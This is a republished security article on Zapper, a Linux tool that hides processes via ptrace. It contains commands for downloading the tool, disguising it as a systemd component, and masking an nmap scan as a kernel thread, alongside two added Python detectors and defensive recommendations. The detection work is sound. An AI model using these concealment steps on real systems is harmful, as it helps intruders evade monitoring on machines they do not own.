How Ukrainian Cyber Warriors Use Zapper to Hide Malicious Linux Processes

Zapper, a Linux process‑hiding tool created by Hacker’s Choice, runs without root, manipulates the ELF auxiliary vector via ptrace, hides command‑line arguments, environment variables and child processes with negligible overhead, and has been observed in real Ukrainian cyber‑war operations, prompting specific defensive recommendations.

Intro: Experienced attackers think like defenders: they know what logs look like and how SIEM alerts fire, so they adopt advanced stealth techniques. Zapper is a representative stealth tool that has even been used in the Ukrainian cyber war.

What Is Zapper?

Zapper is a Linux‑only process‑hiding utility developed by the well‑known hacker group Hacker’s Choice. Unlike crude hiding methods, its implementation is elegant and low‑impact.

Key features described by the developers:

No root required: It can run without elevated privileges, which is critical because early‑stage intruders often lack root.

Supports static binaries: It works even when the target runs a statically compiled Go program.

Comprehensive hiding scope: It can hide command‑line arguments and the process’s environment variables visible in /proc/<PID>/environ.

Does not rely on LD_PRELOAD or libc tricks: Zapper uses ptrace() to manipulate the ELF auxiliary vector, avoiding detection mechanisms that monitor library hooking.

Extremely low performance overhead: The authors report an overhead of roughly one‑thousandth (0.1%), making it practically invisible to performance monitoring.

"-n <pid>" trick: Allows Zapper to launch a target program under any specified PID by rapidly creating and terminating processes until the desired PID aligns, enabling the malicious process to masquerade as a legitimate system service.

Using Zapper

Obtaining the binary

The first step is to download the binary from the official release page:

$ curl -fL -o zapper https://github.com/hackerschoice/zapper/releases/latest/download/zapper-linux-$(uname -m) && chmod 755 zapper && ./zapper -h

In practice, defenders often monitor HTTP traffic for suspicious domains such as "hackerschoice". Attackers therefore host the binary on compromised servers and rename it to a legitimate‑sounding name, e.g.:

$ mv zapper systemd-control

Placing the renamed binary in /lib/systemd/ and matching timestamps makes it indistinguishable from a genuine systemd component, illustrating why blue teams cannot rely solely on file names.

Running a hidden process

Executing the renamed binary shows its help menu:

$ ./systemd-control -h

Zapper enables several stealth techniques:

Full hiding: Both the binary itself and all its child processes are concealed.

Creating hidden tmux sessions: Persistent connections that remain invisible in normal process listings.

Hiding command‑line arguments: Even when the process name is visible, all options can be stripped, making the process appear benign.

Practical demo: hiding an nmap scan

To illustrate, Zapper can wrap a typical nmap scan so that the process pretends to be a kernel worker thread:

$ exec ./systemd-control -f -a '[kworker/2:2-events_power_efficient]' nmap IP -Pn -sV -sC > /dev/shm/scan.txt &

The scan runs in the background, and standard ps or grep commands reveal no suspicious entries. The results are written to /dev/shm/scan.txt, demonstrating a realistic stealth technique used by penetration testers.

Technical Principles

Zapper’s core relies on creative abuse of Linux’s process‑tracing mechanism. When a process attaches to another via ptrace(), it can intervene on specific system calls. Zapper tracks fork and exec events and modifies the process’s displayed information without triggering obvious anomalies.

The crucial data structure is the ELF auxiliary vector, populated by the kernel at program load and containing information for the dynamic linker. By using ptrace() to directly edit this vector, Zapper alters what the /proc filesystem reports, avoiding any library‑function hooks or the LD_PRELOAD mechanism that many security tools monitor.

For defenders, this means traditional detection based on file names, process‑list traversal, or common hooking techniques may fail. Detection must shift toward behavior analysis and anomalous system‑call pattern recognition.
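The shift toward behavior-based checks can start with a simple consistency test. The demo above makes a user-space program present itself as "[kworker/2:2-events_power_efficient]", but a genuine kernel thread has an empty /proc/<PID>/cmdline (ps only prints the bracketed name for it), descends from kthreadd (PID 2), has no user address space (no VmSize line in status) and cannot be resolved through /proc/<PID>/exe. The following is an added example written for this article, not code from the Zapper project or from Hackers Arise; it scores each process against those facts, first on a constructed snapshot so it runs offline, with a small live reader for a real Linux host. The sample PIDs, paths and names are constructed.

```python
"""Defensive heuristic: flag user-space processes posing as kernel threads.

Added example, not part of the original article or of Zapper. A process whose
cmdline is a bracketed kernel-thread-style name is already anomalous, because
real kernel threads have an empty cmdline; the remaining checks corroborate.
"""
import os
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

KTHREADD_PID = 2                                   # every real kernel thread descends from kthreadd
KTHREAD_NAME = re.compile(r"^\[[^\]]+\]$")          # e.g. "[kworker/2:2-events_power_efficient]"


@dataclass
class ProcEntry:
    pid: int
    cmdline: str                # /proc/<pid>/cmdline with NULs replaced by spaces
    exe: Optional[str]          # readlink(/proc/<pid>/exe), None when unreadable
    ppid: int                   # PPid from /proc/<pid>/status
    vm_size_kb: Optional[int]   # VmSize from status; kernel threads have none
    fds: int = 0                # number of entries in /proc/<pid>/fd


def kthread_impersonation_reasons(p: ProcEntry) -> List[str]:
    """Return why an entry looks like a fake kernel thread (empty list = not suspicious)."""
    if not KTHREAD_NAME.match(p.cmdline.strip()):
        return []                                    # empty cmdline (real kthread) or an ordinary program
    reasons = ["bracketed kernel-thread name appears in cmdline"]
    if p.exe is not None:
        reasons.append(f"exe resolves to {p.exe}")
    if p.ppid not in (0, KTHREADD_PID):
        reasons.append(f"parent is PID {p.ppid}, not kthreadd")
    if p.vm_size_kb is not None:
        reasons.append(f"has a user address space (VmSize {p.vm_size_kb} kB)")
    if p.fds > 0:
        reasons.append(f"holds {p.fds} open file descriptors")
    return reasons


def scan_snapshot(entries: List[ProcEntry]) -> Dict[int, List[str]]:
    """Map PID -> reasons for every suspicious entry in a snapshot."""
    return {p.pid: r for p in entries if (r := kthread_impersonation_reasons(p))}


def read_live_proc() -> List[ProcEntry]:
    """Build ProcEntry objects from the running host's /proc (Linux only).

    Run as root: /proc/<pid>/exe of another user's process is unreadable
    otherwise, which would silently drop the 'exe resolves' signal.
    """
    entries = []
    for name in os.listdir("/proc"):
        if not name.isdigit():
            continue
        base = f"/proc/{name}"
        try:
            with open(f"{base}/cmdline", "rb") as f:
                cmdline = f.read().replace(b"\0", b" ").decode(errors="replace")
            try:
                exe = os.readlink(f"{base}/exe")
            except OSError:
                exe = None
            ppid, vm = 0, None
            with open(f"{base}/status") as f:
                for line in f:
                    if line.startswith("PPid:"):
                        ppid = int(line.split()[1])
                    elif line.startswith("VmSize:"):
                        vm = int(line.split()[1])
            try:
                fds = len(os.listdir(f"{base}/fd"))
            except OSError:
                fds = 0
        except OSError:
            continue                                 # exited mid-scan or not readable
        entries.append(ProcEntry(int(name), cmdline, exe, ppid, vm, fds))
    return entries


# Constructed snapshot: a real kworker, a disguised scanner, and a plain shell.
SAMPLE_SNAPSHOT = [
    ProcEntry(123, "", None, KTHREADD_PID, None, 0),
    ProcEntry(4242, "[kworker/2:2-events_power_efficient]", "/usr/bin/nmap", 1717, 53120, 7),
    ProcEntry(1717, "-bash", "/usr/bin/bash", 1700, 10240, 4),
]

if __name__ == "__main__":
    for pid, reasons in scan_snapshot(SAMPLE_SNAPSHOT).items():
        print(pid, "->", "; ".join(reasons))
```

On a live host, `scan_snapshot(read_live_proc())` applies the same test to every PID; the snapshot form is what you would feed from an EDR process dump or a forensic /proc capture.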

Defensive Recommendations

If you are on the defensive side, consider adding the following to your threat model:

Prioritize behavior detection over signature matching: Since Zapper hides without altering binaries, focus on unusual process‑creation patterns, especially parent processes that are unknown binaries.

Monitor data beyond /proc: Although Zapper conceals /proc entries, the attacker’s activities (network scans, file reads/writes) can still generate system‑level anomalies.

PID anomaly detection: The -n <pid> option forces a process to run under a specific PID, leading to abnormal PID allocation bursts. Watching for rapid PID creation and destruction can reveal this behavior.

Restrict suspicious download sources: Track access to known hacker‑tool repositories on GitHub, such as the "hackerschoice" organization, to catch attempts to fetch Zapper or similar utilities.
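The PID anomaly recommendation above can be turned into a concrete detector: the "-n <pid>" trick only works by having one parent create and immediately terminate a burst of children until the counter reaches the wanted value, so the signal is "one parent, many children, lifetimes of milliseconds, all inside a short window". The following is an added example, not code from the article or from any monitoring product; the event log format ("<epoch> fork ppid=N pid=N" / "<epoch> exit pid=N") is constructed for the demo and is not what auditd, execsnoop or any specific eBPF tool emits, so adapt `parse_events` to your own source. Sample PIDs and timestamps are constructed.

```python
"""Defensive heuristic for PID-churn bursts (the "-n <pid>" pattern).

Added example, not from the original article. Correlates fork/exit events,
keeps only short-lived children, and alerts when one parent produced more
than `min_children` of them inside a sliding `window_s` window.
"""
import re
from collections import defaultdict, deque
from typing import Dict, List, Optional, Tuple

# Constructed log format for the demo, NOT a real tool's output:
#   "<epoch_seconds> fork ppid=<n> pid=<n>"   and   "<epoch_seconds> exit pid=<n>"
EVENT_RE = re.compile(r"^(?P<ts>\d+(?:\.\d+)?) (?P<kind>fork|exit) (?P<kv>.*)$")

Event = Tuple[float, str, int, Optional[int]]        # (timestamp, kind, pid, ppid)


def parse_events(lines: List[str]) -> List[Event]:
    """Parse log lines into events sorted by time, forks before exits at equal time."""
    events: List[Event] = []
    for line in lines:
        m = EVENT_RE.match(line.strip())
        if not m:
            continue                                  # ignore lines from other subsystems
        kv = dict(pair.split("=", 1) for pair in m["kv"].split())
        ppid = int(kv["ppid"]) if "ppid" in kv else None
        events.append((float(m["ts"]), m["kind"], int(kv["pid"]), ppid))
    events.sort(key=lambda e: (e[0], 0 if e[1] == "fork" else 1))
    return events


def detect_pid_churn(events: List[Event], window_s: float = 1.0,
                     min_children: int = 100, max_lifetime_s: float = 0.05) -> List[Dict]:
    """Return one alert per parent whose short-lived children exceed min_children in a window."""
    forked: Dict[int, Tuple[float, Optional[int]]] = {}       # pid -> (fork time, ppid)
    short_lived = defaultdict(list)                           # ppid -> [(fork time, pid)]
    for ts, kind, pid, ppid in events:
        if kind == "fork":
            forked[pid] = (ts, ppid)
        elif pid in forked:
            fork_ts, parent = forked.pop(pid)
            if ts - fork_ts <= max_lifetime_s:
                short_lived[parent].append((fork_ts, pid))

    alerts = []
    for parent, kids in short_lived.items():
        kids.sort()
        window: deque = deque()
        best: List[Tuple[float, int]] = []
        for fork_ts, pid in kids:                     # sliding window over fork times
            window.append((fork_ts, pid))
            while fork_ts - window[0][0] > window_s:
                window.popleft()
            if len(window) > len(best):
                best = list(window)
        if len(best) >= min_children:
            pids = [p for _, p in best]
            alerts.append({"ppid": parent, "children": len(best),
                           "first_pid": min(pids), "last_pid": max(pids),
                           "span_s": round(best[-1][0] - best[0][0], 3)})
    return alerts


def build_sample_log() -> List[str]:
    """Constructed sample: benign cron jobs plus one parent churning 300 PIDs."""
    lines, t = [], 1_700_000_000.0
    for i, pid in enumerate((1501, 1502, 1503)):      # cron (PID 900): children live ~0.5 s
        lines.append(f"{t + i:.3f} fork ppid=900 pid={pid}")
        lines.append(f"{t + i + 0.5:.3f} exit pid={pid}")
    for i in range(300):                              # PID 4242: 300 children, 1 ms apart, 1 ms lifetime
        ts = t + 10 + i * 0.001
        lines.append(f"{ts:.3f} fork ppid=4242 pid={6000 + i}")
        lines.append(f"{ts + 0.001:.3f} exit pid={6000 + i}")
    return lines


if __name__ == "__main__":
    for alert in detect_pid_churn(parse_events(build_sample_log())):
        print(alert)
```

The thresholds are deliberately conservative: build systems and shells legitimately spawn many short-lived children, so tune `min_children` and `max_lifetime_s` against a baseline of your own hosts, and treat a hit as a lead to pivot on the parent PID (its exe, cmdline and network activity) rather than as a verdict.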

Original Information

Original title: Zapper – How Hackers Hide Malicious Process
Source: Hackers Arise
Link: https://hackers-arise.com/linux-zapper-how-hackers-hide-malicious-process/


Tags: defense, Linux security, ptrace, process hiding, ELF auxiliary vector, Zapper
Written by

Black & White Path

We are the beacon of the cyber world, a stepping stone on the road to security.
